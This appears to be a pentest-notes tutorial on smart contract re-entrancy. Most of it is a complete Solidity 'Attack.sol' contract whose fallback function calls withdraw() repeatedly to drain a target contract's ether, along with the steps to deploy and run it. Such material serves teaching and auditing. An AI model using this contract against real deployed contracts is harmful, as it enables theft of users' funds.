Pentest Notes

Smart Contract Pentesting

Last modified: 2022-12-01

Blockchain Ethereum Web3

A smart contract is a program or a transaction protocol that is commonly used in decentralized applications.

Tools

  • Remix IDE

    An online tool that allows us to deploy a smart contract and run transactions.


Re-entrancy Attack

Re-entrancy is a common vulnerability in Solidity contracts that involves the withdraw and deposit functions.
For example, create “Attack.sol”.

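pragma solidity ^0.8.10;
import './Target.sol';

contract Attack {

     // Contract under test; it exposes deposit() and withdraw().
     Target public target;
     constructor(address _targetAddress) {
         target = Target(_targetAddress);
     }

     // Runs when this contract receives Ether; calls withdraw() again
     // while the target still holds at least 1 ether.
     fallback() external payable {
         if (address(target).balance >= 1 ether) {
             target.withdraw();
         }
     }

     // Deposits 1 ether into the target, then starts the first withdrawal.
     function attack() external payable {
         require(msg.value >= 1 ether);
         target.deposit{value: 1 ether}();
         target.withdraw();
     }

     // Returns the Ether currently held by this contract.
     function getBalance() public view returns (uint) {
         return address(this).balance;
     }
}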

After compiling, deploy it and run the “attack” function to get the balance by compromising the target contract.